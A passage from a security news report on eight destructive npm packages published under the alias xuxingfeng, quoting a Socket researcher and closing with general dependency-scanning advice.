Masquerading as harmless plugins and utilities, the malicious packages carried destructive payloads meant to corrupt data, wipe critical files, and crash systems. Since their upload, they’ve picked up over 6200 downloads, escaping detection and slipping into unsuspecting developer environments.
“The threat actor behind this campaign, using the npm alias xuxingfeng with a registration email 1634389031@qq[.]com, has published eight packages designed to cause widespread damage across the JavaScript ecosystem,” said Socket researcher Kush Pandya in a blog post. “Notably, the same account has also published several legitimate, non-malicious packages that function as advertised.”
Earlier this month, hackers were found abusing npm to target multi-language developers with typo-squatted packages containing stealer and RCE codes. Boychenko advised applying standard hygiene while managing dependencies from npm. He recommended using dependency-scanning tools to flag post-install hooks, hardcoded URLs, and unusually small tar archives, in addition to strengthening the development pipeline with automated security checks.
